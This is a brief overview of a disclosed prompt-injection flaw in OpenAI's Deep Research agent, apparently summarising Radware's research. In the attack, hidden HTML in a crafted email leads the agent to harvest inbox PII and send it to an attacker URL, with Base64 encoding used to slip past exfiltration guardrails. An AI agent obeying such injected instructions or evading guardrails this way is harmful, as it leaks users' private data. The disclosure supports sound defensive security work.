Overview
- Radware reported the issue on June 18 via Bugcrowd, OpenAI implemented a fix in early August, and acknowledged it as resolved on September 3 before public disclosure this week.
- A crafted email hid instructions in HTML that, when processed by Deep Research, coerced the agent to harvest inbox PII and call an attacker URL using the browser.open tool.
- Researchers boosted reliability by Base64‑encoding the extracted data before appending it to the URL, which helped bypass guardrails that flagged direct exfiltration.
- Requests originated from OpenAI’s infrastructure rather than the user’s device, leaving minimal local traces and evading many enterprise monitoring controls.
- The proof of concept targeted Gmail but the technique could apply to other connectors such as Google Drive, Dropbox, Outlook, GitHub, HubSpot, Notion, and SharePoint; Radware says the specific PoC no longer works and there is no public evidence of real‑world abuse.